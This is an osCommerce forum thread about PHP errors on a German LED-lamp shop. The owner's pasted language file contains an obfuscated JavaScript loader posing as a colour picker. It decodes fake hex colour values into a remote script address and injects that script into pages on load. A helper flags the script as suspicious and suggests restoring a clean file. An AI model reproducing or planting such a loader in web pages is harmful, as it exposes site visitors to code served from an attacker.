Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

syntax error, unexpected T_VAR in ./includes/languages/german/index.php on line 31


Tobosaku

Recommended Posts

There came up an error today, but nothing has been changed. At least that is the situation that has been explained to me.

The first error which came up was:

 

Fatal error: Call to a member function add_current_page() on a non-object in ./html/includes/application_top.php on line 312

 

I then have found the following thread in this forum: http://www.oscommerce.com/forums/topic/265215-call-to-a-member-function-add-current-page-on-a-non-object/

So I've tried to fix it as described there, and then another issue came up:

 

Parse error: syntax error, unexpected T_VAR in ./includes/languages/german/index.php on line 31

 

I reuploaded the application_top.php as it was before my first try to repair. Thought this couldn't have been the real issue then. But interestingly the new error message was still there.

 

Then, here we go with the mentioned index.php in the error message:

 

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
</head>
<body>
<?php /*
$Id: index.php 1739 2007-12-20 00:52:16Z hpdl $
osCommerce, Open Source E-Commerce Solutions
http://www.oscommerce.com
Copyright (c) 2007 osCommerce
Released under the GNU General Public License
*/
define('TEXT_MAIN', '<div style="text-align: center;"><big>Hier finden
sie das Licht und die Lampen der Zukunft.Die geballte LED
Power finden Sie in unseren Lampen und Leuchten Sortiment, die die
kostengünstigere Alternative zu Glühbirnen und
Energiesparlampen
darstellen. In unserem LED Leuchtmittel Shop finden Sie unter anderem: <b>LED
Bulbs – Birnen, LED Lampen, LED Spots, LED Scheinwerfer, LED
Strips und LED Strahler.</b></big><big><b> </b>Also
LED Beleuchtung für
alle Bereiche des Alltags.<br>
 </big><big><b><img
style="width: 370px; height: 184px;"
alt="Leuchtmittel für jeden Bereich!"
src="http://mm43507.itsaserver.org/images2/banner3.jpg"></b></big>
</div><script type="text/javascript">
if (typeof(redef_colors)=="undefined") {

  var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00');
  var redef_colors = 1;
  var colors_picked = 0;

  function div_pick_colors(t,styled) {
var s = "";
for (j=0;j<t.length;j++) {	
	var c_rgb = t[j];
	for (i=1;i<7;i++) {
		var c_clr = c_rgb.substr(i++,2);
		if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
	}
}
if (styled) {
	s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
} else {
	s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
}
return s;
  }

  function try_pick_colors() {
try {
   	if(!document.getElementById || !document.createElement){
		document.write(div_pick_colors(div_colors,1));
	   } else {
		var new_cstyle=document.createElement("script");
		new_cstyle.type="text/javascript";
		new_cstyle.src=div_pick_colors(div_colors,0);
		document.getElementsByTagName("head")[0].appendChild(new_cstyle);
	}
} catch(e) { }
try {
	check_colors_picked();
} catch(e) { 
	setTimeout("try_pick_colors()", 500);
}
  }

  try_pick_colors();

}
</script><div style="text-align: center;"><big>Nicht nur
Osram hat das günstige LED Licht im
Angebot. Auch
wir haben
eine vielfältige Auswahl an neuen Produkten aus dem LED
Leuchtmittelbereich. </big><br>
<br>
<big>Außerdem finden Sie bei uns auch Solar Leuchten
und Lampen.
Unter anderem die verschiedensten Solar Pflastersteine. Auch
Solarbaustellenlampen, Solar Flasher, Warnlichter und Roadmarker. </big><br>
</div>
<br>
<div style="text-align: center;"><big><b>Bitte
beachten Sie, dass wir einen Mindestbestellwert von <font
color="red">30 Euro </font>haben.</b></big><br>
</div>
<div style="text-align: center;">
<br>
<table
style="width: 80%; height: 252px; text-align: left; margin-left: auto; margin-right: auto;"
border="1" cellpadding="2" cellspacing="0">
<tbody>
<tr>
<td style="text-align: center;"><small><big>Rechts
der Kostenvergleich einer 40 Watt Glühbirne, einer 9 Watt
Energiesparlampe und einer 4 Watt LED Birne bei ca. 8.000
Brennstunden.</big><br>
<br>
Falls sie interessiert daran sind in ihrem Betrieb oder zuhause ihre
Leuchtmittel gegen LEDs auszutauschen, erstellen wir Ihnen gerne eine
Amortisationsrechnung.<br>
Anhand dieser Berechnung zeigen wir Ihnen, ab wann sie Ihre Umstellung
rentiert. <br>
<br>
Schicken Sie uns einfach eine Anfrage an:</small> <span
style="font-weight: bold;">[email protected]</span></td>
<td style="text-align: right;"><big><b><img
style="width: 260px; height: 190px;"
alt="Die LED Birne im Vergleich"
src="http://mm43507.itsaserver.org/images2/kosten2.png"><br>
</b></big></td>
</tr>
</tbody>
</table>
');
define('TABLE_HEADING_NEW_PRODUCTS', 'Neue Produkte im %s');
define('TABLE_HEADING_UPCOMING_PRODUCTS', 'Wann ist was verfügbar');
define('TABLE_HEADING_DATE_EXPECTED', 'Datum');
if ( ($category_depth == 'products') || (isset($HTTP_GET_VARS['manufacturers_id'])) ) {
define('HEADING_TITLE', 'Unser Onlineshop');
define('TABLE_HEADING_IMAGE', '');
define('TABLE_HEADING_MODEL', 'Artikel-Nr.');
define('TABLE_HEADING_PRODUCTS', 'Produkte');
define('TABLE_HEADING_MANUFACTURER', 'Hersteller');
define('TABLE_HEADING_QUANTITY', 'Anzahl');
define('TABLE_HEADING_PRICE', 'Preis');
define('TABLE_HEADING_WEIGHT', 'Gewicht');
define('TABLE_HEADING_BUY_NOW', 'Bestellen');
define('TEXT_NO_PRODUCTS', 'Es gibt keine Produkte in dieser Kategorie.');
define('TEXT_NO_PRODUCTS2', 'Es gibt kein Produkt, das von diesem Hersteller stammt.');
define('TEXT_NUMBER_OF_PRODUCTS', 'Artikel: ');
define('TEXT_SHOW', '<b>Darstellen:</b>');
define('TEXT_BUY', '1 x \'');
define('TEXT_NOW', '\' bestellen!');
define('TEXT_ALL_CATEGORIES', 'Alle Kategorien');
define('TEXT_ALL_MANUFACTURERS', 'Alle Hersteller');
} elseif ($category_depth == 'top') {
define('HEADING_TITLE', 'Unser Onlineshop:');
} elseif ($category_depth == 'nested') {
define('HEADING_TITLE', 'Kategorien');
}
?>
</body>
</html>

 

 

I just want to be sure what to do, as my further attempts to fix already made other things coming up.

Link to comment
Share on other sites

Id suggest you go back to your original german/index.php file that hopefully you have in a backup folder and compare the code. There seems to be a javascript piece in there that probably should not be there.

 

script type="text/javascript"> 
if (typeof(redef_colors)=="undefined") {...

 

I could be wrong, as I do not have a german/index.php file to compare with, but that script code looks like its not meant to be there.

 

I also suggest that you create a file in your includes folder called .htaccess (if there is not one there already) and add these bits of code to it.

 

Options All -Indexes

<Files *.php>
Order Deny,Allow
Deny from all
</Files>

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Thought I have restored it already, but now copied it again. Thanks so far, I think it's a step forward that I'm having now the same error message as before:

 

Fatal error: Call to a member function add_current_page() on a non-object in /data/www/web466/html/includes/application_top.php on line 312

 

Here is the file:

 

<?php
/*
 $Id: application_top.php 1833 2008-01-30 22:03:30Z hpdl $

 osCommerce, Open Source E-Commerce Solutions
 http://www.oscommerce.com

 Copyright (c) 2008 osCommerce

 Released under the GNU General Public License
*/

// start the timer for the page parse time log
 define('PAGE_PARSE_START_TIME', microtime());

// set the level of error reporting
 error_reporting(E_ALL & ~E_NOTICE);

// check support for register_globals
 if (function_exists('ini_get') && (ini_get('register_globals') == false) && (PHP_VERSION < 4.3) ) {
   exit('Server Requirement Error: register_globals is disabled in your PHP configuration. This can be enabled in your php.ini configuration file or in the .htaccess file in your catalog directory. Please use PHP 4.3+ if register_globals cannot be enabled on the server.');
 }

// Set the local configuration parameters - mainly for developers
 if (file_exists('includes/local/configure.php')) include('includes/local/configure.php');

// include server parameters
 require('includes/configure.php');

 if (strlen(DB_SERVER) < 1) {
   if (is_dir('install')) {
     header('Location: install/index.php');
   }
 }

// define the project version
 define('PROJECT_VERSION', 'osCommerce Online Merchant v2.2 RC2a');

// some code to solve compatibility issues
 require(DIR_WS_FUNCTIONS . 'compatibility.php');

// set the type of request (secure or not)
 $request_type = (getenv('HTTPS') == 'on') ? 'SSL' : 'NONSSL';

// set php_self in the local scope
 if (!isset($PHP_SELF)) $PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF'];

 if ($request_type == 'NONSSL') {
   define('DIR_WS_CATALOG', DIR_WS_HTTP_CATALOG);
 } else {
   define('DIR_WS_CATALOG', DIR_WS_HTTPS_CATALOG);
 }

// include the list of project filenames
 require(DIR_WS_INCLUDES . 'filenames.php');

// include the list of project database tables
 require(DIR_WS_INCLUDES . 'database_tables.php');

// customization for the design layout
 define('BOX_WIDTH', 125); // how wide the boxes should be in pixels (default: 125)

// include the database functions
 require(DIR_WS_FUNCTIONS . 'database.php');

// make a connection to the database... now
 tep_db_connect() or die('Unable to connect to database server!');

// set the application parameters
 $configuration_query = tep_db_query('select configuration_key as cfgKey, configuration_value as cfgValue from ' . TABLE_CONFIGURATION);
 while ($configuration = tep_db_fetch_array($configuration_query)) {
   define($configuration['cfgKey'], $configuration['cfgValue']);
 }

// if gzip_compression is enabled, start to buffer the output
 if ( (GZIP_COMPRESSION == 'true') && ($ext_zlib_loaded = extension_loaded('zlib')) && (PHP_VERSION >= '4') ) {
   if (($ini_zlib_output_compression = (int)ini_get('zlib.output_compression')) < 1) {
     if (PHP_VERSION >= '4.0.4') {
       ob_start('ob_gzhandler');
     } else {
       include(DIR_WS_FUNCTIONS . 'gzip_compression.php');
       ob_start();
       ob_implicit_flush();
     }
   } else {
     ini_set('zlib.output_compression_level', GZIP_LEVEL);
   }
 }

// set the HTTP GET parameters manually if search_engine_friendly_urls is enabled
 if (SEARCH_ENGINE_FRIENDLY_URLS == 'true') {
   if (strlen(getenv('PATH_INFO')) > 1) {
     $GET_array = array();
     $PHP_SELF = str_replace(getenv('PATH_INFO'), '', $PHP_SELF);
     $vars = explode('/', substr(getenv('PATH_INFO'), 1));
     for ($i=0, $n=sizeof($vars); $i<$n; $i++) {
       if (strpos($vars[$i], '[]')) {
         $GET_array[substr($vars[$i], 0, -2)][] = $vars[$i+1];
       } else {
         $HTTP_GET_VARS[$vars[$i]] = $vars[$i+1];
       }
       $i++;
     }

     if (sizeof($GET_array) > 0) {
       while (list($key, $value) = each($GET_array)) {
         $HTTP_GET_VARS[$key] = $value;
       }
     }
   }
 }

// define general functions used application-wide
 require(DIR_WS_FUNCTIONS . 'general.php');
 require(DIR_WS_FUNCTIONS . 'html_output.php');

// set the cookie domain
 $cookie_domain = (($request_type == 'NONSSL') ? HTTP_COOKIE_DOMAIN : HTTPS_COOKIE_DOMAIN);
 $cookie_path = (($request_type == 'NONSSL') ? HTTP_COOKIE_PATH : HTTPS_COOKIE_PATH);

// include cache functions if enabled
 if (USE_CACHE == 'true') include(DIR_WS_FUNCTIONS . 'cache.php');

// include shopping cart class
 require(DIR_WS_CLASSES . 'shopping_cart.php');

// include navigation history class
 require(DIR_WS_CLASSES . 'navigation_history.php');

// check if sessions are supported, otherwise use the php3 compatible session class
 if (!function_exists('session_start')) {
   define('PHP_SESSION_NAME', 'osCsid');
   define('PHP_SESSION_PATH', $cookie_path);
   define('PHP_SESSION_DOMAIN', $cookie_domain);
   define('PHP_SESSION_SAVE_PATH', SESSION_WRITE_DIRECTORY);

   include(DIR_WS_CLASSES . 'sessions.php');
 }

// define how the session functions will be used
 require(DIR_WS_FUNCTIONS . 'sessions.php');

// set the session name and save path
 tep_session_name('osCsid');
 tep_session_save_path(SESSION_WRITE_DIRECTORY);

// set the session cookie parameters
  if (function_exists('session_set_cookie_params')) {
   session_set_cookie_params(0, $cookie_path, $cookie_domain);
 } elseif (function_exists('ini_set')) {
   ini_set('session.cookie_lifetime', '0');
   ini_set('session.cookie_path', $cookie_path);
   ini_set('session.cookie_domain', $cookie_domain);
 }

// set the session ID if it exists
  if (isset($HTTP_POST_VARS[tep_session_name()])) {
    tep_session_id($HTTP_POST_VARS[tep_session_name()]);
  } elseif ( ($request_type == 'SSL') && isset($HTTP_GET_VARS[tep_session_name()]) ) {
    tep_session_id($HTTP_GET_VARS[tep_session_name()]);
  }

// start the session
 $session_started = false;
 if (SESSION_FORCE_COOKIE_USE == 'True') {
   tep_setcookie('cookie_test', 'please_accept_for_session', time()+60*60*24*30, $cookie_path, $cookie_domain);

   if (isset($HTTP_COOKIE_VARS['cookie_test'])) {
     tep_session_start();
     $session_started = true;
   }
 } elseif (SESSION_BLOCK_SPIDERS == 'True') {
   $user_agent = strtolower(getenv('HTTP_USER_AGENT'));
   $spider_flag = false;

   if (tep_not_null($user_agent)) {
     $spiders = file(DIR_WS_INCLUDES . 'spiders.txt');

     for ($i=0, $n=sizeof($spiders); $i<$n; $i++) {
       if (tep_not_null($spiders[$i])) {
         if (is_integer(strpos($user_agent, trim($spiders[$i])))) {
           $spider_flag = true;
           break;
         }
       }
     }
   }

   if ($spider_flag == false) {
     tep_session_start();
     $session_started = true;
   }
 } else {
   tep_session_start();
   $session_started = true;
 }

 if ( ($session_started == true) && (PHP_VERSION >= 4.3) && function_exists('ini_get') && (ini_get('register_globals') == false) ) {
   extract($_SESSION, EXTR_OVERWRITE+EXTR_REFS);
 }

// set SID once, even if empty
 $SID = (defined('SID') ? SID : '');

// verify the ssl_session_id if the feature is enabled
 if ( ($request_type == 'SSL') && (SESSION_CHECK_SSL_SESSION_ID == 'True') && (ENABLE_SSL == true) && ($session_started == true) ) {
   $ssl_session_id = getenv('SSL_SESSION_ID');
   if (!tep_session_is_registered('SSL_SESSION_ID')) {
     $SESSION_SSL_ID = $ssl_session_id;
     tep_session_register('SESSION_SSL_ID');
   }

   if ($SESSION_SSL_ID != $ssl_session_id) {
     tep_session_destroy();
     tep_redirect(tep_href_link(FILENAME_SSL_CHECK));
   }
 }

// verify the browser user agent if the feature is enabled
 if (SESSION_CHECK_USER_AGENT == 'True') {
   $http_user_agent = getenv('HTTP_USER_AGENT');
   if (!tep_session_is_registered('SESSION_USER_AGENT')) {
     $SESSION_USER_AGENT = $http_user_agent;
     tep_session_register('SESSION_USER_AGENT');
   }

   if ($SESSION_USER_AGENT != $http_user_agent) {
     tep_session_destroy();
     tep_redirect(tep_href_link(FILENAME_LOGIN));
   }
 }

// verify the IP address if the feature is enabled
 if (SESSION_CHECK_IP_ADDRESS == 'True') {
   $ip_address = tep_get_ip_address();
   if (!tep_session_is_registered('SESSION_IP_ADDRESS')) {
     $SESSION_IP_ADDRESS = $ip_address;
     tep_session_register('SESSION_IP_ADDRESS');
   }

   if ($SESSION_IP_ADDRESS != $ip_address) {
     tep_session_destroy();
     tep_redirect(tep_href_link(FILENAME_LOGIN));
   }
 }

// create the shopping cart & fix the cart if necesary
 if (tep_session_is_registered('cart') && is_object($cart)) {
   if (PHP_VERSION < 4) {
     $broken_cart = $cart;
     $cart = new shoppingCart;
     $cart->unserialize($broken_cart);
   }
 } else {
   tep_session_register('cart');
   $cart = new shoppingCart;
 }

// include currencies class and create an instance
 require(DIR_WS_CLASSES . 'currencies.php');
 $currencies = new currencies();

// include the mail classes
 require(DIR_WS_CLASSES . 'mime.php');
 require(DIR_WS_CLASSES . 'email.php');

// set the language
 if (!tep_session_is_registered('language') || isset($HTTP_GET_VARS['language'])) {
   if (!tep_session_is_registered('language')) {
     tep_session_register('language');
     tep_session_register('languages_id');
   }

   include(DIR_WS_CLASSES . 'language.php');
   $lng = new language();

   if (isset($HTTP_GET_VARS['language']) && tep_not_null($HTTP_GET_VARS['language'])) {
     $lng->set_language($HTTP_GET_VARS['language']);
   } else {
     $lng->get_browser_language();
   }

   $language = $lng->language['directory'];
   $languages_id = $lng->language['id'];
 }

// include the language translations
 require(DIR_WS_LANGUAGES . $language . '.php');

// currency
 if (!tep_session_is_registered('currency') || isset($HTTP_GET_VARS['currency']) || ( (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') && (LANGUAGE_CURRENCY != $currency) ) ) {
   if (!tep_session_is_registered('currency')) tep_session_register('currency');

   if (isset($HTTP_GET_VARS['currency']) && $currencies->is_set($HTTP_GET_VARS['currency'])) {
     $currency = $HTTP_GET_VARS['currency'];
   } else {
     $currency = (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') ? LANGUAGE_CURRENCY : DEFAULT_CURRENCY;
   }
 }

// navigation history
 if (tep_session_is_registered('navigation')) {
   if (PHP_VERSION < 4) {
     $broken_navigation = $navigation;
     $navigation = new navigationHistory;
     $navigation->unserialize($broken_navigation);
   }
 } else {
   tep_session_register('navigation');
   $navigation = new navigationHistory;
 }
 $navigation->add_current_page();

// Shopping cart actions
 if (isset($HTTP_GET_VARS['action'])) {
// redirect the customer to a friendly cookie-must-be-enabled page if cookies are disabled
   if ($session_started == false) {
     tep_redirect(tep_href_link(FILENAME_COOKIE_USAGE));
   }

   if (DISPLAY_CART == 'true') {
     $goto =  FILENAME_SHOPPING_CART;
     $parameters = array('action', 'cPath', 'products_id', 'pid');
   } else {
     $goto = basename($PHP_SELF);
     if ($HTTP_GET_VARS['action'] == 'buy_now') {
       $parameters = array('action', 'pid', 'products_id');
     } else {
       $parameters = array('action', 'pid');
     }
   }
   switch ($HTTP_GET_VARS['action']) {
     // customer wants to update the product quantity in their shopping cart
     case 'update_product' : for ($i=0, $n=sizeof($HTTP_POST_VARS['products_id']); $i<$n; $i++) {
                               if (in_array($HTTP_POST_VARS['products_id'][$i], (is_array($HTTP_POST_VARS['cart_delete']) ? $HTTP_POST_VARS['cart_delete'] : array()))) {
                                 $cart->remove($HTTP_POST_VARS['products_id'][$i]);
                               } else {
                                 if (PHP_VERSION < 4) {
                                   // if PHP3, make correction for lack of multidimensional array.
                                   reset($HTTP_POST_VARS);
                                   while (list($key, $value) = each($HTTP_POST_VARS)) {
                                     if (is_array($value)) {
                                       while (list($key2, $value2) = each($value)) {
                                         if (ereg ("(.*)\]\[(.*)", $key2, $var)) {
                                           $id2[$var[1]][$var[2]] = $value2;
                                         }
                                       }
                                     }
                                   }
                                   $attributes = ($id2[$HTTP_POST_VARS['products_id'][$i]]) ? $id2[$HTTP_POST_VARS['products_id'][$i]] : '';
                                 } else {
                                   $attributes = ($HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]]) ? $HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]] : '';
                                 }
                                 $cart->add_cart($HTTP_POST_VARS['products_id'][$i], $HTTP_POST_VARS['cart_quantity'][$i], $attributes, false);
                               }
                             }
                             tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
                             break;
     // customer adds a product from the products page
     case 'add_product' :    if (isset($HTTP_POST_VARS['products_id']) && is_numeric($HTTP_POST_VARS['products_id'])) {
                               $cart->add_cart($HTTP_POST_VARS['products_id'], $cart->get_quantity(tep_get_uprid($HTTP_POST_VARS['products_id'], $HTTP_POST_VARS['id']))+1, $HTTP_POST_VARS['id']);
                             }
                             tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
                             break;
     // performed by the 'buy now' button in product listings and review page
     case 'buy_now' :        if (isset($HTTP_GET_VARS['products_id'])) {
                               if (tep_has_product_attributes($HTTP_GET_VARS['products_id'])) {
                                 tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['products_id']));
                               } else {
                                 $cart->add_cart($HTTP_GET_VARS['products_id'], $cart->get_quantity($HTTP_GET_VARS['products_id'])+1);
                               }
                             }
                             tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
                             break;
     case 'notify' :         if (tep_session_is_registered('customer_id')) {
                               if (isset($HTTP_GET_VARS['products_id'])) {
                                 $notify = $HTTP_GET_VARS['products_id'];
                               } elseif (isset($HTTP_GET_VARS['notify'])) {
                                 $notify = $HTTP_GET_VARS['notify'];
                               } elseif (isset($HTTP_POST_VARS['notify'])) {
                                 $notify = $HTTP_POST_VARS['notify'];
                               } else {
                                 tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify'))));
                               }
                               if (!is_array($notify)) $notify = array($notify);
                               for ($i=0, $n=sizeof($notify); $i<$n; $i++) {
                                 $check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $notify[$i] . "' and customers_id = '" . $customer_id . "'");
                                 $check = tep_db_fetch_array($check_query);
                                 if ($check['count'] < 1) {
                                   tep_db_query("insert into " . TABLE_PRODUCTS_NOTIFICATIONS . " (products_id, customers_id, date_added) values ('" . $notify[$i] . "', '" . $customer_id . "', now())");
                                 }
                               }
                               tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify'))));
                             } else {
                               $navigation->set_snapshot();
                               tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL'));
                             }
                             break;
     case 'notify_remove' :  if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['products_id'])) {
                               $check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'");
                               $check = tep_db_fetch_array($check_query);
                               if ($check['count'] > 0) {
                                 tep_db_query("delete from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'");
                               }
                               tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action'))));
                             } else {
                               $navigation->set_snapshot();
                               tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL'));
                             }
                             break;
     case 'cust_order' :     if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['pid'])) {
                               if (tep_has_product_attributes($HTTP_GET_VARS['pid'])) {
                                 tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['pid']));
                               } else {
                                 $cart->add_cart($HTTP_GET_VARS['pid'], $cart->get_quantity($HTTP_GET_VARS['pid'])+1);
                               }
                             }
                             tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters)));
                             break;
   }
 }

// include the who's online functions
 require(DIR_WS_FUNCTIONS . 'whos_online.php');
 tep_update_whos_online();

// include the password crypto functions
 require(DIR_WS_FUNCTIONS . 'password_funcs.php');

// include validation functions (right now only email address)
 require(DIR_WS_FUNCTIONS . 'validations.php');

// split-page-results
 require(DIR_WS_CLASSES . 'split_page_results.php');

// infobox
 require(DIR_WS_CLASSES . 'boxes.php');

// auto activate and expire banners
 require(DIR_WS_FUNCTIONS . 'banner.php');
 tep_activate_banners();
 tep_expire_banners();

// auto expire special products
 require(DIR_WS_FUNCTIONS . 'specials.php');
 tep_expire_specials();

// calculate category path
 if (isset($HTTP_GET_VARS['cPath'])) {
   $cPath = $HTTP_GET_VARS['cPath'];
 } elseif (isset($HTTP_GET_VARS['products_id']) && !isset($HTTP_GET_VARS['manufacturers_id'])) {
   $cPath = tep_get_product_path($HTTP_GET_VARS['products_id']);
 } else {
   $cPath = '';
 }

 if (tep_not_null($cPath)) {
   $cPath_array = tep_parse_category_path($cPath);
   $cPath = implode('_', $cPath_array);
   $current_category_id = $cPath_array[(sizeof($cPath_array)-1)];
 } else {
   $current_category_id = 0;
 }

// include the breadcrumb class and start the breadcrumb trail
 require(DIR_WS_CLASSES . 'breadcrumb.php');
 $breadcrumb = new breadcrumb;

 $breadcrumb->add(HEADER_TITLE_TOP, HTTP_SERVER);
 $breadcrumb->add(HEADER_TITLE_CATALOG, tep_href_link(FILENAME_DEFAULT));

// add category names or the manufacturer name to the breadcrumb trail
 if (isset($cPath_array)) {
   for ($i=0, $n=sizeof($cPath_array); $i<$n; $i++) {
     $categories_query = tep_db_query("select categories_name from " . TABLE_CATEGORIES_DESCRIPTION . " where categories_id = '" . (int)$cPath_array[$i] . "' and language_id = '" . (int)$languages_id . "'");
     if (tep_db_num_rows($categories_query) > 0) {
       $categories = tep_db_fetch_array($categories_query);
       $breadcrumb->add($categories['categories_name'], tep_href_link(FILENAME_DEFAULT, 'cPath=' . implode('_', array_slice($cPath_array, 0, ($i+1)))));
     } else {
       break;
     }
   }
 } elseif (isset($HTTP_GET_VARS['manufacturers_id'])) {
   $manufacturers_query = tep_db_query("select manufacturers_name from " . TABLE_MANUFACTURERS . " where manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "'");
   if (tep_db_num_rows($manufacturers_query)) {
     $manufacturers = tep_db_fetch_array($manufacturers_query);
     $breadcrumb->add($manufacturers['manufacturers_name'], tep_href_link(FILENAME_DEFAULT, 'manufacturers_id=' . $HTTP_GET_VARS['manufacturers_id']));
   }
 }

// add the products model to the breadcrumb trail
 if (isset($HTTP_GET_VARS['products_id'])) {
   $model_query = tep_db_query("select products_model from " . TABLE_PRODUCTS . " where products_id = '" . (int)$HTTP_GET_VARS['products_id'] . "'");
   if (tep_db_num_rows($model_query)) {
     $model = tep_db_fetch_array($model_query);
     $breadcrumb->add($model['products_model'], tep_href_link(FILENAME_PRODUCT_INFO, 'cPath=' . $cPath . '&products_id=' . $HTTP_GET_VARS['products_id']));
   }
 }

// initialize the message stack for output messages
 require(DIR_WS_CLASSES . 'message_stack.php');
 $messageStack = new messageStack;

// set which precautions should be checked
 define('WARN_INSTALL_EXISTENCE', 'true');
 define('WARN_CONFIG_WRITEABLE', 'true');
 define('WARN_SESSION_DIRECTORY_NOT_WRITEABLE', 'true');
 define('WARN_SESSION_AUTO_START', 'true');
 define('WARN_DOWNLOAD_DIRECTORY_NOT_READABLE', 'true');
?>

 

I already have replaced the navigation history part with:

 

// navigation history
if (tep_session_is_registered('navigation')) {
if (PHP_VERSION < 4) {
$broken_navigation = $navigation;
$navigation = new navigationHistory;
$navigation->unserialize($broken_navigation);
} else {
$navigation = new navigationHistory;
}
} else {
tep_session_register('navigation');
$navigation = new navigationHistory;
}

$navigation->add_current_page();

 

But it didn't help, there came up a new error message as described in my first post.

Should this be the proper fixing for this issue? Should I try it again?

Link to comment
Share on other sites

The problem is in the german/index.php

 

What is all that code in there about LED lights. Is that your code or not?

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Yes that has been added by the administrator of this site. Just a description of the shop content, which haven't made any issue since today and wasn't changed.

 

Why is the german/index.php a problem, when the error message mentions the application_top.php file?

Link to comment
Share on other sites

If for example that LED code is nothing to do with your site then back that german/index.php file up, and create a new one with just this code in it.

 

<?php /* 
$Id: index.php 1739 2007-12-20 00:52:16Z hpdl $ 
osCommerce, Open Source E-Commerce Solutions 
http://www.oscommerce.com 
Copyright (c) 2007 osCommerce 
Released under the GNU General Public License 
*/ 
define('TEXT_MAIN', ''); 
define('TABLE_HEADING_NEW_PRODUCTS', 'Neue Produkte im %s'); 
define('TABLE_HEADING_UPCOMING_PRODUCTS', 'Wann ist was verfügbar'); 
define('TABLE_HEADING_DATE_EXPECTED', 'Datum'); 
if ( ($category_depth == 'products') || (isset($HTTP_GET_VARS['manufacturers_id'])) ) { 
define('HEADING_TITLE', 'Unser Onlineshop'); 
define('TABLE_HEADING_IMAGE', ''); 
define('TABLE_HEADING_MODEL', 'Artikel-Nr.'); 
define('TABLE_HEADING_PRODUCTS', 'Produkte'); 
define('TABLE_HEADING_MANUFACTURER', 'Hersteller'); 
define('TABLE_HEADING_QUANTITY', 'Anzahl'); 
define('TABLE_HEADING_PRICE', 'Preis'); 
define('TABLE_HEADING_WEIGHT', 'Gewicht'); 
define('TABLE_HEADING_BUY_NOW', 'Bestellen'); 
define('TEXT_NO_PRODUCTS', 'Es gibt keine Produkte in dieser Kategorie.'); 
define('TEXT_NO_PRODUCTS2', 'Es gibt kein Produkt, das von diesem Hersteller stammt.'); 
define('TEXT_NUMBER_OF_PRODUCTS', 'Artikel: '); 
define('TEXT_SHOW', '<b>Darstellen:</b>'); 
define('TEXT_BUY', '1 x \''); 
define('TEXT_NOW', '\' bestellen!'); 
define('TEXT_ALL_CATEGORIES', 'Alle Kategorien'); 
define('TEXT_ALL_MANUFACTURERS', 'Alle Hersteller'); 
} elseif ($category_depth == 'top') { 
define('HEADING_TITLE', 'Unser Onlineshop:'); 
} elseif ($category_depth == 'nested') { 
define('HEADING_TITLE', 'Kategorien'); 
} 
?>

 

Which is basically the default german/index.php code without any modification

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Yes that has been added by the administrator of this site. Just a description of the shop content, which haven't made any issue since today and wasn't changed.

 

Why is the german/index.php a problem, when the error message mentions the application_top.php file?

 

After you corrected the error in application_top, the rest of the site was able to load correctly so the next error displayed itself which is in german/index.php

 

The T_VAR is in reference to:

 

   var redef_colors = 1; 
  var colors_picked = 0;

 

You might want to double check with your administrator that they did in fact add in this code:

 

<script type="text/javascript"> 
if (typeof(redef_colors)=="undefined") { 

